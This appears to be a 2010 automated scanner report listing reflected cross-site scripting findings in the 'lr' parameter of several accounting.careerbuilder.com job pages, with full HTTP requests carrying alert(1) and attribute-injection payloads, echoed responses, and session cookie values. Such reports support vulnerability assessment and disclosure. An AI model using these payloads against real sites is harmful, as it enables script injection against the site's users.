This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189895 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL12 Date: Sun, 14 Nov 2010 23:22:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7a16"%20a%3db%20a8d8796ad8c was submitted in the lr parameter. This input was echoed as e7a16" a=b a8d8796ad8c in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aae7a16"%20a%3db%20a8d8796ad8c HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189156 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL9 Date: Sun, 14 Nov 2010 23:22:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54425'-alert(1)-'69e07ba1259 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197774 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR41 Date: Sun, 14 Nov 2010 23:09:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42478"%20a%3db%203a96f68a939 was submitted in the lr parameter. This input was echoed as 42478" a=b 3a96f68a939 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a542478"%20a%3db%203a96f68a939&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197180 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR15 Date: Sun, 14 Nov 2010 23:06:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d2"%20a%3db%20c76e3eed769 was submitted in the lr parameter. This input was echoed as 7a9d2" a=b c76e3eed769 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a57a9d2"%20a%3db%20c76e3eed769&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196950 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL20 Date: Sun, 14 Nov 2010 23:22:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c60b1'-alert(1)-'078d4fa7612 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197631 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL35 Date: Sun, 14 Nov 2010 23:23:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3df9'-alert(1)-'57eee3b2f1c was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197519 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL11 Date: Sun, 14 Nov 2010 23:23:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20e1"%20a%3db%2003b3bbde943 was submitted in the lr parameter. This input was echoed as c20e1" a=b 03b3bbde943 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c20e1"%20a%3db%2003b3bbde943&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196781 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL24 Date: Sun, 14 Nov 2010 23:22:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56b3d'-alert(1)-'9ff60971f08 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190195 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL27 Date: Sun, 14 Nov 2010 23:24:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69413"%20a%3db%20317ba7aab6a was submitted in the lr parameter. This input was echoed as 69413" a=b 317ba7aab6a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa69413"%20a%3db%20317ba7aab6a HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189577 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL25 Date: Sun, 14 Nov 2010 23:23:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2848d'-alert(1)-'7bd88549adc was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189967 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL32 Date: Sun, 14 Nov 2010 23:24:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a36e"%20a%3db%20771cc9e4121 was submitted in the lr parameter. This input was echoed as 9a36e" a=b 771cc9e4121 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa9a36e"%20a%3db%20771cc9e4121 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189396 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL10 Date: Sun, 14 Nov 2010 23:24:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b54"%20a%3db%204c9a7198dfe was submitted in the lr parameter. This input was echoed as c9b54" a=b 4c9a7198dfe in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c9b54"%20a%3db%204c9a7198dfe&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196881 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL18 Date: Sun, 14 Nov 2010 23:24:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58e6'-alert(1)-'45be1a04315 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197499 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR43 Date: Sun, 14 Nov 2010 23:25:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 351db'-alert(1)-'2f09466539d was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197530 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR4 Date: Sun, 14 Nov 2010 23:27:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21130"%20a%3db%2066d099a642a was submitted in the lr parameter. This input was echoed as 21130" a=b 66d099a642a in the application's response.
